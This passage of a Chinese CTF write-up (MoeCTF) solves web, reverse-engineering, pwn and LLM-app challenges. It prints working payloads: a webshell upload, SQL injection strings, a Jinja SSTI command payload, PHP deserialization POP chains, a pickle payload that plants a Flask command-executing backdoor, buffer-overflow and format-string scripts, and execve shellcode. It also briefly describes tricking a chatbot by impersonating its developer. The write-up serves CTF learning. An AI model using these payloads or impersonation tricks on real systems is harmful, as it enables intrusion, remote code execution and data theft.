32429597712898788634301884219187226083, 219683174528279300995710495669083670544, 37001671152735870067433052249003677244, 40408367335919429215031155701333780256, 156957056705864208022145617831060134907, 180077610045061934161783737112285900966, 59357544819520045255625797086421901884, 77751400794807935281264495346525107329, 4517615764752715802675887411287287137, 76319782726782483955139757169428276003, 176009402215469456144386392247781430661, 283055695252017869386094188584670242363, 20001716567499724882317501875143788088, 125228382132280749989067609697418628387, 144053090751393640875176862167012247830, 15289106046221987660093620422889539867, 111243866573605033251079958638430165633, 169264885994758018612038619809803723688, 11895954311759483419234457833286931577, 273147053963507607445612310063799123998, 158981773284803069491507978382595811562, 41293513794446810141896116395025053234, 57441237860743029006005815967510568612, 109171476551418034153338841133917497633, 136539712287056106151501004438585146777, 278918550892367788720071091355436733468, 211360251223022250021398148918837686812, 254351242496347083009146404917085951637, 130260153203964833202474997491055897705, 221930288825889900517852991745469270910, 66354211799382156899053592476719001842, 127898620670768976254134750731374490934, 298131830425274848646460016809595859328, 132109510144911727511061804395381822418, 210917766469026421985352121201196497206, 5441137715689271309917542693016936841, 209516950406881264617228336887254107528, 92275151703152148383106907311559718841, 46255650973652148247469464088017660080, 182628529221607295465655096378164148336, 52574278547120304143820897608762444985, 63698472804719856407197390836793525437, 30457182690865024857724004613999433676, 212073418196280214618461610817423630022, 48875930775858981513092672396243080640, 113234797533868946026347891158142991388, 256534108458875318962058222544020064164, 22522715662428558833985333846937440705, 97553118958308509177643330175409499003, 197088081433425221073434635573357125592, 157303116668734020456228309942188293059, 110316346669278795114546305726864504681, 228887397917708007004920589862367347873, 112210930213921962308944716344585917343, 95017760786235266842788931502689331157, 303479014347753799316861720146531596843, 138677197920058856282155251074088437081, 285912176726299387362893467150449209426, 120309832759140713296686339140142433386, 279125897926861811239250830750932241600, 289502053647872994218190050825294169535, 262459212837236162171047720358005836712, 290390838897912466575239533978002826151, 292988850197951752250595007039860868400, 34796135808311610468205608686622819504, 25206338413385638687826160218013868658, 42180804482932648992176529097078580055, 195897225052351816559125785179252565465, 290060760535408066224831756224248708027, 34243626514368402883316460494646065629, 159497726968729366867935528734367549832, 267785772871046662107247674801793846921, 47342328853090920958565777290912999560, 194980176549393239742230551297786993434, 88020247887557921707284362381274951852, 255474100333005567974457204812640809071, 93324791124684170744053910877870176609, 69542826141091170218040988642070014011, 188678529221313094426441439309063681864, 56030802691247887446204447769438570825, 74312207153349149422500961216106557393, 153811406554673020809393530896156460494, 130232956128662318657579623819323546361, 241587755919930468705435097001858194189, 150548598672513907492388638742866339038, 38780469811591978249139697733603217652, 237554030153815380781978075720171312418, 96541634878634946114738393982914693394, 83284071476491638125716901346418260661, 277535192833115492238855935055373371297, 92291115416977028401374199691398676627, 105634075531674200869064066234662065605, 59669321288506854711632528171527160495, 24913178886798791108798737682436779604, 191902245938756063865405758957515936934, 200833770402179506644143905670947994664, 249327029439265065126080906281744759655, 2368715218056973901783211260781833927, 133209645820509536502329231321782644514, 170083361139958757944996287868734988169, 143242266754832252556264383809361085258, 198438133508477313319510861550461456953, 226416574016152349355240811564666677855, 131995850810926550122710727062184985075, 206211971624338783828953817981719254101, 95022339713176475801874420969255633409, 39239785273544046574575511790952158726, 6761950061835300419279903725369635970, 160849355761964483498641169767552240859, 44129081383649229398785011378026849128, 116611486899507912253396257166983831123, 102748760887182142877957834312659347601, 100973668783270797012352094429175531207, 110548564207426762905750742091610942634, 205424582078496700107783237952155124442, 210932790939110827079725957948996247757, 54413304958149902897514912130730392489, 181315803651356180100745517014898850424, 183346938138867395962624263310328788228, 133507835720650939452036529283981720094, 244220649646693249242542702657146329679, 111814540087048948955999016117121133729, 210757262617434713384638061648414714521, 31712005436857719771604404352654183712, 299210790483067037892753875410776716305, 34216439939230284515095120240039231491, 246820219620854547856488049434101568744, 298588211282375015522910461809769779222, 53320103067319149790078933423751044737, 164977173816081040725650999609390274279, 234782977255751828939911143180631329578, 61521250269407451751766565186333346163, 119529895182262920689181379893081203421, 154588465395872896210615516764102943961, 153034255402211966905777978896125271527, 65497510688725487475002809757533544579, 76824114145168270682129892469858568031, 218064880554787781811938382300930885801, 196850060586188141836799779247809406205, 176023892018381269394229104598502170110, 32491776807255207889633110137157036238, 41150198830446315717651890670848632754, 260753023840843193587871227195221789744, 48345408122882987831052823644867513356, 80045935233531979816083287928071697883, 131878104259519592871955471048058374000, 15534379538690707223440448056318568055, 131291412522855581131329717355299310716, 37018675243998552749630837151597269431, 144343493968520204610097930388908478903, 67236444178494959708570043908346657722, 102574100831305499879105427279131095784, 249069309513964056714882166119752611668, 210718130986716991560768592011623825976, 266242407402824082344585571101593909650, 205203132247422842477137158586071965100, 301157372202750742637385626243753030679, 40886620741595313792996852647181029560, 253361171396328884567373946949359324229, 50071128101197582041162516700015376269, 106002417001877546867386840932652850816, 224086864980106045542532841236299648038, 42103921294151508500634063253613482845, 49777138159264482913170680298952908154, 24324534484842395819609478778764950811, 204106593629836179932302789646808274058, 266707066043760482642609614924857456238, 18723835069315957900598472598907945204, 244338819469013923747256697307964210342, 36296287172854997655950896217230267111, 292888671179451539882069138267865661448, 287111415651274690627399445990831389362, 79940439572496625318602146625920961720, 288270505176661814341807462681727466925, 153921178962139214138689743179633342125, 263564317934507756965522450042219801757, 197993323684501153884855839599466707355, 72143993205715719344183507132882267579, 67511075584002491895239101559049103979, 231396344630318648781207380069016790960, 268490084177254392405211695854127631350, 45968181401712207064942095991325993181, 34472329776995578971329318400545600788, 112967316661320871429337739209994987784, 209508577387521479468956337084132598710, 194445696189141465862938111222574992064, 229942079198360020568341753187100646148, 47944382795398541172186729027517882654, 54806201653083974379270761512143387910, 93457347627015900562505045196097224001, 152033139738914238723733340538181549419, 123719026823969669345162603978875451754, 154704533151410142607151617227929824563, 32428281285686815618553795197210513625, 265229864831280807254743597731258298440, 14904705423314872103792141735779112532, 177442398230615511669857060547212895616, 144918716871520627851549439448066637518, 203019416536984157536348865479415073573, 288452420706913930307744155709559750006, 282516471994395201735206793889605510595, 150722332251745138694381051866105655391, 234504581837296595003379465512031425988, 44178766618576668748878202507789103195, 217129489675072754441642067295058817201, 245087939287551829934600756568137757979, 240954534396950014938672406581264782638]

decrypted_flag = decrypt_flag(ciphertext, p, a)
print(decrypted_flag)

Web渗透测试与审计

Web渗透测试与审计入门指北

利用phpstudy进行搭建,得到flag

web入门

弗拉格之地的入口

进入题目,hint是爬虫,联想到robots.txt,打开得到/webtutorEntry.php,进入页面得到flag

moectf{CONGr@Tu14TioN-foR-KNOwlNG-ROBOtS_txT10e7d}

ez_http

ez_http1

ez_http2

ez_http3

ez_http4

moectf{y0u-4RE_ReA1lY-re@LlY_verY_c1EVEr!!!20ed}

垫刀之路01: MoeCTF?启动!

正常流程

1
ls / ->cat /flag #提示在环境里 ->输入env

垫刀之路02: 普通的文件上传

提示和01一样应该也在env里

传个一句话木马,然后打开env即可

垫刀之路03: 这是一个图床

加了图片限制,写一个一句话,末尾改成jpg,抓包再把jpg改成php,执行system(‘env’);就行了

垫刀之路04: 一个文件浏览器

考察的知识点是目录遍历。简单的翻了一下不在目前的目录下通过../往上查找,(需要url编码),找到flag那一层,进去提示不在该文件下

根据moejail_lv1的提示猜测在tmp的目录下,里面有flag,得到答案。

1
?path=../../../..//tmp/flag

垫刀之路05: 登陆网站

先想到是尝试爆破的,突然下面跳出以前sql注入的记录

试了一下就出来了,进行了简答的截取绕过

1
a' or 1=1 #

垫刀之路06: pop base mini moe

直接上wp

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
class A {
    private $evil='cat /flag';
    public $a;
}
class B {
    private $b= 'system';
}
$exp = new A();
$exp->a = new B();

$serialized_data = serialize($exp);
echo "?data=".urlencode($serialized_data) ;

这里微调一下代码,$a前面的private需要改成public,要不然调用不了$a.

垫刀之路07: 泄漏的密码

考察的Flask,得到pin进入console里面

1
2
3
4
>>>os.listdir()
['__pycache__', 'flag', 'app.py', 'getPIN.py', 'static', 'templates']
>>> with open('flag', 'r') as f: print(f.read().strip())
moectf{DONT_usIng-fLasK_6y_DE6UG_MOd_aNd-le4k-YOuR_p1nb}

静态网页

这题需要抓包看回显,orz我之前一直在看前端

看/api/get/?id=1-53可以得到具体的php

进去是一个MD5绕过

原来想着自绕过的,但是没有办法

后来直接a=0a,b[0a]=md5(0a)即可绕过,思路没转过来

who’s blog?

fenjing一把梭得到答案

1
?id={{cycler.next.__globals__.__builtins__.__import__('os').popen('env').read()}};

ProveYourLove

方法1:抓包,发包得到flag

love1

love2

方法2:不会第一种可以手动删cookie,慢慢按

方法3:我做的时候没想到发包,在对应前端检测的地方打断点控制台绕过了,不推荐

弗拉格之地的挑战

第0层:直接进/flag1ab.html

第一层:看源码得到提示和下一层

1
2
<!--flag1: bW9lY3Rm-->
<!--下一步:/flag2hh.php-->

第二层:如图所示

挑战

flag2 e0FmdEV
nextpage /flag3cad.php

第三层:

1
2
3
?a=a
b=a
cookie:verify=admin

flag3: yX3RoMXN

/flag4bbc.php

第四层:

控制台手动触发打断点

1
2
3
4
5
6
7
8
9
var event = new MouseEvent('click', {
    'view': window,
    'bubbles': true,
    'cancelable': true
});

var button = document.getElementById("scope").getElementsByTagName("button")[0];
button.id = 9; // 首先将其ID设置为9
button.dispatchEvent(event); // 手动触发点击事件
1
2
flag4: fdFVUMHJ
前往:/flag5sxr.php

第五层:

提示框输入相应的内容,控制台输入content=’aaa’,对应内容打断点

flag5: fSV90aDF

第六层:?moe=FLAG

post:moe=1

flag6: rZV9VX2t

第七层:

what=system(‘cat /f*’);

得到flag:rbm93X1dlQn0=

最后七层的flag拼接base64得到答案

bW9lY3Rme0FmdEVyX3RoMXNfdFVUMHJfSV90aDFrZV9VX2trbm93X1dlQn0=

moectf{AftEr_th1s_tUT0r_I_th1ke_U_kknow_WeB}

moe pop

先上源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
<?php
class class000 {
    private $payl0ad = 0;
    protected $what;

    public function __destruct()
    {
        $this->check();
    }

    public function check()
    {
        if($this->payl0ad === 0)
        {
            die('FAILED TO ATTACK');
        }
        $a = $this->what;
        $a();
    }
}
class class001 {
    public $payl0ad;
    public $a;
    public function __invoke()
    {
        $this->a->payload = $this->payl0ad;
    }
}

class class002 {
    private $sec;
    public function __set($a, $b)
    {
        $this->$b($this->sec);
    }

    public function dangerous($whaattt)
    {
        $whaattt->evvval($this->sec);
    }

}
class class003 {
    public $mystr;
    public function evvval($str)
    {
        eval($str);
    }

    public function __tostring()
    {
        return $this->mystr;
    }
}
if(isset($_GET['data']))
{
    $a = unserialize($_GET['data']);
}
else {
    highlight_file(__FILE__);
}

进行简单的代码审计,从后往前推

class003有eval函数可以进行利用,class002中调用dangerous函数可以利用拼接,想引用dangerous可以给class001的payl0ad进行赋值利用a来new一个class002,要使用invoke函数的话,可以看class000,首先令payl0ad=000,成功正常的,成功给what赋值new class001

大题的思路就是这样正推的话直接上payload,为了连接起来,部分内容需要修改成public

exp:

1
2
3
4
5
6
7
8
$exp = new class000;
$exp->what=new class001;
$exp->what->payl0ad='dangerous';
$exp->what->a=new class002;
$exp1=new class003;
$exp1->mystr='phpinfo();';
$exp->what->a->sec = $exp1;
echo urlencode(serialize($exp));

payl0ad和sec我都改成public了,最后可以在phpinfo里面找到flag,ctrl+f搜索moe

勇闯铜人阵

😋之前自己敲完一个代码之后就了解了一些基础了,晚上敲一会出来了,自己代码能力还是要练一下的,关键点可能就是session保持持续会话,我第一次尝试的时候没用到session,第二次是代码逻辑问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import requests
from bs4 import BeautifulSoup
import re
url = 'http://127.0.0.1:59353/'
session = requests.Session()
response = session.get(url)
post_data = {'player': "123", 'direct': "弟子明白"}
post_response = session.post(url, data=post_data)
def get_direction(number):
    directions = {
        1: "北方",
        2: "东北方",
        3: "东方",
        4: "东南方",
        5: "南方",
        6: "西南方",
        7: "西方",
        8: "西北方"
    }
    return directions.get(number, "无效的方向")

def extract(html_content):
    tag = BeautifulSoup(html_content, 'html.parser').find('h1', id='status')
    return tag.text if tag else "状态未找到"

def extract_numbers(text):
    return [int(num) for num in re.findall(r'\d+', text)]

for i in range(5):
    # 提取状态文本
    status_text = extract(post_response.text)
    print(f"状态: {status_text}")

    numbers = extract_numbers(status_text)
    count = len(numbers)

    if count == 1:
        ans = f"{get_direction(numbers[0])}"
    else:
        ans = ",".join([f"{get_direction(num)}一个" for num in numbers])

    print(f"方向: {ans}")

    payload = {'player': "123", 'direct': ans}
    post_response = session.post(url, data=payload)

    status_text = extract(post_response.text)
    print(f"新的状态: {status_text}")

电院_Backend

过了一阵子才写,其实就是简单的sql注入,只是不怎么遇到sql的题目,所以也就不怎么会写了

1
test@example.com' UNION SELECT null, null, null --

进行绕过得到flag

ImageCloud前置

其实应该算在ssrf里面吧,利用?url=file:///etc/passwd,读取到flag

ImageCloud

一开始尝试了图片一句话和vps外带执行命令,完全就是逻辑方向错了。

根据hint的提示给的是损坏的,但是容器是好的,再细看app2.py的代码(我一开始就没看

可以得出其实容器开了两个端口?利用**?url=http://127.0.0.1:xxxx/image/flag.jpg**,然后结合bp快速扫一下5001-6000的端口

就找到flag.jpg所在位置,图片上有flag

cloud

PetStore(复现)

是个pickle的题目,写的时候没有往内存马那边想后来请教学长告诉了可以直接打个🐎进去,因为种种原因直到结束都没再写,复现一下。以下是一开始的个人思路。

关键的代码定位是import_pet部分的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
def import_pet(self, serialized_pet) -> bool:
    try:
        pet_data = base64.b64decode(serialized_pet)
        pet = pickle.loads(pet_data)
        if isinstance(pet, Pet):
            for i in self.pets:
                if i.uuid == pet.uuid:
                    return False
            self.pets.append(pet)
            return True
        return False
    except Exception as e:
        return False
1
2
3
4
5
6
7
def export_pet(self, pet_uuid) -> str | None:
    pet = self.get_pet(pet_uuid)
    if pet is not None:
        self.pets.remove(pet)
        serialized_pet = base64.b64encode(pickle.dumps(pet)).decode("utf-8")
        return serialized_pet
    return None

要反序列化读取env得到flag,dockerfile是写在env里的,容器不出网,题目容器侧无法主动发起与外部网络的连接。

测试了正常的通过uuid收养一个新宠物正常通过然后改成__reduce__想读取env,但是读取不通

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import pickle
import base64
import uuid
import os

class Pet:
    def __init__(self, name, species, uuid):
        self.name = name
        self.species = species
        self.uuid = uuid
	#def __repr__(self):
    #   return f"Pet(name={self.name}, species={self.species}, uuid={self.uuid})"
    def __reduce__(self):
        return (os.system, ("env",))
    	#return eval,("__import__('os').system('env')",)

uuid = str(uuid.uuid4())
print(uuid)
a= pickle.dumps(pet)
print(a)
encoded_pet = base64.b64encode(a).decode('utf-8')

print(f"Encoded Payload: {encoded_pet}")

(ps:想想其实有什么空白文件把内容打印到上面也行的,还是老老实实打个内存马吧)然后是正常的推进思路打个内存马进去

1
2
3
4
5
6
7
8
9
10
11
12
13
import pickle
import base64

class Pet:
    def __reduce__(self):
        cmd_injection = "__import__('os').popen(request.args.get('cmd')).read()"
        return eval, ("__import__('sys').modules['__main__'].__dict__['app']"
                      ".before_request_funcs.setdefault(None, []).append(lambda :" + cmd_injection + ")",)

# 创建类实例并序列化为pickle,再进行base64编码
a = Pet()
b = pickle.dumps(a)
print(base64.b64encode(b).decode())

然后执行?cmd=env可以读取flag

Re: 从零开始的 XDU 教书生活(复现)

困惑点在我怎么得到所有学生的学号以及密码登陆,因为是python写还需要分析加密逻辑,以及由于是动态的二维码图片,我想的是一个程序跑登陆学生,一个程序教师端登陆不断的发包请求识别下载二维码以保证图片的,可能确实是思路发散的太多了

代码思路是首先,使用老师的账号登录并获取二维码,然后退出登录。用每个学生的账号进行登录,使用事先获取的签到 URL 来完成签到。xxx需要自己填对应内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
import requests

url = 'xxx'
teacher_phone = '10000'
password = teacher_phone

QR_code_params = {
    "id": "xxx",
    "c": "xxx",
    "enc": "xxx",
    "DB_STRATEGY": "PRIMARY_KEY",
    "STRATEGY_PARA": "id"
}

# 持续化 session
session = requests.session()

def teacher_login():
    try:
        response = session.post(f"{url}/fanyalogin", data={
            "uname": teacher_phone,
            "password": password
        })
        response_data = response.json()
        if response_data.get('status'):
            print("Teacher logged in successfully.")
        else:
            raise Exception("Teacher login failed.")
    except Exception as e:
        print(f"Error during teacher login: {e}")
        raise

def get_student_account():
    try:
        response = session.get(f"{url}/widget/sign/pcTeaSignController/showSignInfo1")
        students = response.json().get("data", {}).get("changeUnSignList", [])
        return [student["uid"] for student in students]
    except Exception as e:
        print(f"Error fetching student account: {e}")
        return []

def student_login(phone):
    try:
        response = session.post(f"{url}/fanyalogin", data={
            "uname": str(phone),
            "password": str(phone)
        })
        return response.json().get('status', False)
    except Exception as e:
        print(f"Error during student login for {phone}: {e}")
        return False

def scan_QR():
    try:
        response = session.get(f"{url}/widget/sign/e", params=QR_code_params)
        return response.text
    except Exception as e:
        print(f"Error scanning QR code: {e}")
        return ""

def main():
    teacher_login()
    student_phones = get_student_account()

    if not student_phones:
        print("No students to process.")
        return

    successful_sign_ins = 0

    for index, phone in enumerate(student_phones, start=1):
        print(f"Processing student {phone} (#{index})...")
        if student_login(phone):
            print(f"Student {phone} logged in successfully.")
            result = scan_QR()
            print(f"Scan result for student {phone}: {result}")
            if "签到成功" in result:
                successful_sign_ins += 1
            # Clear session cookies to prevent carry-over issues
            session.cookies.clear()
        else:
            print(f"Student {phone} login failed.")

    print(f"All students processed. Total successful sign-ins: {successful_sign_ins}.")
    if successful_sign_ins == len(student_phones):
        print("All students have signed in successfully.")
    else:
        print(f"{len(student_phones) - successful_sign_ins} students failed to sign in.")

if __name__ == "__main__":
    main()

smbms(复现)

这题没看,做起来其实主要就是sql这边的注入慢慢的调试吧默认是admin然后bp来fuzz一下密码,得到1234567

然后就是慢慢调试sqlmap了,最后的命令如图

sms

开发与运维基础

运维入门指北

1
2
3
4
5
6
find . -name "*.bak" -type f -exec rm -f {} +
find . -name "*.xml" -type f -exec sh -c 'for file; do mv -- "$file" "${file%.xml}.html"; done' _ {} +
find . -type f | while read -r file; do filename=$(basename "$file"); dir1=${filename:0:2}; dir2=${filename:2:2}; mkdir -p "$dir1/$dir2"; mv "$file" "$dir1/$dir2/$filename"; done
su toor
mv * /var/www/html/
grep 'flag' /var/log/nginx/access.log

哦不!我的libc!

用xshell进行连接,简单测试一下常规的语句都不能用了

使用Shell 内建命令

1
while IFS= read -r line; do echo "$line"; done < /flag.txt

得到flag

大语言模型应用安全

Neuro?

先我是vedal回答,然后告诉他亲自好像(二次认证好像,不太记得了

并非助手

尝试了一会正常的是不能输入的,表情包可以,联想到flag就是旗子,输入🚩得到flag

逆向工程

逆向工程入门指北

代码放在c环境里面运行就行

xor

进行简单的异或就行

1
2
3
4
5
6
7
8
ls=[0x49, 0x4B, 0x41, 0x47, 0x50, 0x42, 0x5F, 0x41, 0x1C, 0x16, 0x46,0x10, 0x13,
0x1C, 0x40, 9, 0x42, 0x16, 0x46, 0x1C, 9, 0x10,0x10,0x42, 0x1D, 9, 0x46, 0x15,
0x14,0x14, 9, 0x17, 0x16, 0x14,0x41, 0x40,0x40, 0x16, 0x14, 0x47, 0x12, 0x40,
0x14, 0x59]
s=''
for i in ls:
s+=chr(i^0x24)
print(s)

TEA

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include <iostream>

void decrypt(unsigned int &v4, unsigned int &v5) {
    unsigned int delta = 0x9E3779B9;  // 固定值 1640531527
    unsigned int v3 = delta * 32;     // 反向过程从最大值开始
    int v6 = 32;

    while (v6 > 0) {
        v5 -= ((v4 + v3) ^ ((v4 << 4) + 1634038898)) ^ ((v4 >> 5) + 1634038904);
        v4 -= ((v5 + v3) ^ ((v5 << 4) + 1702060386)) ^ ((v5 >> 5) + 1870148662);
        v3 -= delta;  // 解密时减少 delta
        v6--;
    }
}

int main() {
    unsigned int v4 = 676078132;  // xxxxxxxx 部分解密后的值
    unsigned int v5 = 957400408;  // zzzz 和 yyyy 部分解密后的值

    // 调用解密函数
    decrypt(v4, v5);

    // 提取出 yyyy 和 zzzz 部分
    unsigned int v11 = (v5 >> 16) & 0xFFFF;  // yyyy 部分
    unsigned int v9 = v5 & 0xFFFF;           // zzzz 部分

    // 输出结果
    std::cout << "xxxxxxxx = " << std::hex << v4 << std::endl;
    std::cout << "yyyy = " << std::hex << v11 << std::endl;
    std::cout << "zzzz = " << std::hex << v9 << std::endl;
    std::cout << "moectf{" << std::hex << v4 << "-" << v11 << "-" << v9 << "-9c42-caf30620caaf}" << std::endl;
    return 0;
}

upx

先使用upx工具先脱壳,再进行ida的正常阅读

里面直接由flag

moectf{ec5390dd-f8cf-4b02-bc29-3bb0c5604c29}

upx-revenge

ESP x64dbg手动脱壳一下用ida64打开得到flag

upx-renvenge

dynamic

下载打开文件,按shift+f12找到对应的页面,找到what happened to my flag?

里面有一段逻辑进行REencrypto之后就变了,给what那行打断点,f9动调得到flag

dynamic

d0tN3t

用dnSpy打开定位到关键代码,然后写解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#include <iostream>
#include <vector>

int main() {
    std::vector<uint8_t> array = {
        173, 146, 161, 174, 132, 179, 187, 234, 231, 244,
        177, 161, 65, 13, 18, 12, 166, 247, 229, 207,
        125, 109, 67, 180, 230, 156, 125, 127, 182, 236,
        105, 21, 215, 148, 92, 18, 199, 137, 124, 38,
        228, 55, 62, 164
    };

    std::string flag;

    for (int i = 0; i < array.size(); ++i) {
        char decrypted_char = static_cast<char>((array[i] ^ (i * i)) ^ 114) - 114;
        flag += decrypted_char;
    }

    std::cout << "Decrypted Flag: " << flag << std::endl;

    return 0;
}

逆向工程进阶指北

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <iostream>
#include <cstring>

using namespace std;

int find(int i, unsigned int* arr) {
    for (int j = 33; j <= 126; j++)
        for (int k = 33; k <= 126; k++)
            for (int l = 33; l <= 126; l++)
                for (int m = 33; m <= 126; m++) {
                    unsigned char temp[] = { (unsigned char)j, (unsigned char)k, (unsigned char)l, (unsigned char)m };
                    unsigned int* p = (unsigned int*)temp;
                    if (((*p * 0xccffbbbb + 0xdeadc0de) ^ 0xdeadbeef + 0xd3906) == arr[i]) {
                        cout << (char)j << (char)k << (char)l << (char)m;
                        return 0;
                    }
                }
    return -1;  // 返回-1表示没有找到匹配的字符组合
}

int main() {
    unsigned int arr[] = {
        0xb5073388, 0xf58ea46f, 0x8cd2d760, 0x7fc56cda,
        0x52bc07da, 0x29054b48, 0x42d74750, 0x11297e95,
        0x5cf2821b, 0x747970da, 0x64793c81
    };

    for (int i = 0; i < 11; i++) {
        if (find(i, arr) == -1) {
            cout << "No match found for arr[" << i << "]\n";
        }
    }
    cout << endl;
    return 0;
}

SecretModule

下载得到文件,打开看customize.sh,提示base64,解密后下载文件,得到以下内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
testk() {
  echo "Welcome to the Secret module!But before you begin,you need to prove your self."
  (/system/bin/getevent -lc 1 2>&1 | /system/bin/grep VOLUME | /system/bin/grep " DOWN" > $MODPATH/events) || return 1
  return 0
}   

choose() {
  while true; do
    /system/bin/getevent -lc 1 2>&1 | /system/bin/grep VOLUME | /system/bin/grep " DOWN" > $MODPATH/events
    if (`cat $MODPATH/events 2>/dev/null | /system/bin/grep VOLUME >/dev/null`); then
      break
    fi
  done
  if (`cat $MODPATH/events 2>/dev/null | /system/bin/grep VOLUMEUP >/dev/null`); then
    echo "114514"
  else
    echo "1919810"
  fi
}

if testk; then
  ui_print "Great! Now enter the secret."

else
  ui_print "Legacy Device. Use a newer device to do this challenge"
  exit
fi

concatenated=""

for i in 1 2 3 4 5 6 7
do
  result=$(choose)
  concatenated="${concatenated}${result}"
done

input_str=$(echo -n $concatenated | md5sum | awk '{print $1}')
sec="77a58d62b2c0870132bfe8e8ea3ad7f1"
if test $input_str = $sec
then
	echo 'You are right!Flag is'
    echo "moectf{$concatenated}"
else
    echo 'Wrong. Try again.'
	exit

gpt帮帮我,写出解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import hashlib
import itertools

def md5_hash(s):
    return hashlib.md5(s.encode()).hexdigest()

# 目标哈希值
target_hash = "77a58d62b2c0870132bfe8e8ea3ad7f1"

# 定义两个可能的结果
options = ["114514", "1919810"]
# 枚举所有可能的组合,7个位置,每个位置有两个可能的选择
for combo in itertools.product(options, repeat=7):
    # 组合成一个字符串
    concatenated = "".join(combo)
    # 计算其 MD5 哈希值
    hashed = md5_hash(concatenated)

    # 如果哈希值匹配目标
    if hashed == target_hash:
        print(f"找到匹配的输入序列: {combo}")
        print(f"输入字符串: {concatenated}")
        print(f"Flag 是: moectf{{{concatenated}}}")
        break

rc4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#include<stdio.h>
#include<string.h>
typedef unsigned longULONG;
/*初始化函数*/
void rc4_init(unsigned char*s, unsigned char*key, unsigned long Len)
{
    int i = 0, j = 0;
    char k[256] = { 0 };
    unsigned char tmp = 0;
    for (i = 0; i<256; i++)
    {
        s[i] = i;
        k[i] = key[i%Len];
    }
    for (i = 0; i<256; i++)
    {
        j = (j + s[i] + k[i]) % 256;
        tmp = s[i];
        s[i] = s[j];//交换s[i]和s[j]
        s[j] = tmp;
    }
} 
/*加解密*/
void rc4_crypt(unsigned char*s, unsigned char*Data, unsigned long Len)
{
    int i = 0, j = 0, t = 0;
    unsigned long k = 0;
    unsigned char tmp;
    for (k = 0; k<Len; k++)
    {
        i = (i + 1) % 256;
        j = (j + s[i]) % 256;
        tmp = s[i];
        s[i] = s[j];//交换s[x]和s[y]
        s[j] = tmp;
        t = (s[i] + s[j]) % 256;
        Data[k] ^= s[t];
    }
}
 
int main()
{
    unsigned char flag[]=
    {
     	 0xA7,0x1A,0x68,0xEC,0xD8,0x27,0x11,0xCC,0x8C,0x9B,0x16,0x15,0x5C,0xD2,0x67,0x3E,0x82,0xAD,0xCE,0x75,0xD4,
		 0xBC,0x57,0x56,0xC2,0x8A,0x52,0xB8,0x6B,0xD6,0xCC,0xF8,0xA4,0xBA,0x72,0x2F,0xE0,0x57,0x15,0xB9,0x24,0x11
    };
    unsigned char key[]="RC4_1s_4w3s0m3";
    unsigned  char s[256]={0};
    rc4_init(s,key,14);
    rc4_crypt(s,flag,42);
    int i;
    for(i=0;i<=42;i++){
		printf("%c",flag[i]);
	}
    }

二进制漏洞审计

二进制漏洞审计入门指北

nc连接一下就出来了

NotEnoughTime

是个数学题,写个脚本交互一下吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *
from Crypto.Util.number import *
import re

def work(io):
    # 初始交互,发送设置值
    io.recvuntil(b"ones.")
    io.sendlineafter(b'=', b'2')
    io.sendlineafter(b'=', b'0')
    
    # 进入到数学表达式部分
    io.recvuntil(b'PREPARED!')
    a = io.recvuntil(b'=')
    
    # 循环处理数学表达式
    while True:
        # 清理接收到的表达式,移除空白字符并替换除法符号
        aa = re.sub(r'[ \t\n\r=]+', '', a.decode()).replace('/', '//')
        
        # 计算表达式的结果
        ans = eval(aa)
        print(f"Calculated Answer: {ans}")
        
        # 将计算结果发送回服务器
        io.sendline(str(ans).encode())
        
        try:
            # 接收下一个表达式
            a = io.recvuntil(b'=')
        except EOFError:
            # 如果没有更多表达式则跳出循环
            break

# 连接到远程服务,端口为62593
io = remote('192.168.114.1', 63631)

# 执行工作函数
work(io)

# 保持交互
io.interactive()

no_more_gets

1
2
3
4
5
6
7
8
9
10
11
from pwn import *

def exp(io):
    io.recvuntil(b'out.')  # 接收直到指定字符串
    payload = b'A' * (0x50 + 0x8) + p64(0x40101a) + p64(0x401176)  # 构造 payload
    io.sendline(payload)  # 发送 payload

# 使用正确的 IP 地址
io = remote('192.168.114.1', 63945)  # 建立远程连接
exp(io)  # 执行 exp 函数
io.interactive()  # 进入交互模式

leak_sth

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
p=remote("192.168.114.1",56731)
payload=b"%7$p"
p.sendline(payload)
p.recvuntil(b"Your name:\n0x")
data=p.recv(8)
print("data=",data)
data=int(data,16)
print("data2=",hex(data))
p.sendline(str(data))
p.interactive()

这是什么?shellcode!

1
2
3
4
5
6
7
8
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
p = remote('192.168.114.1',53436)

shellcode="\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"

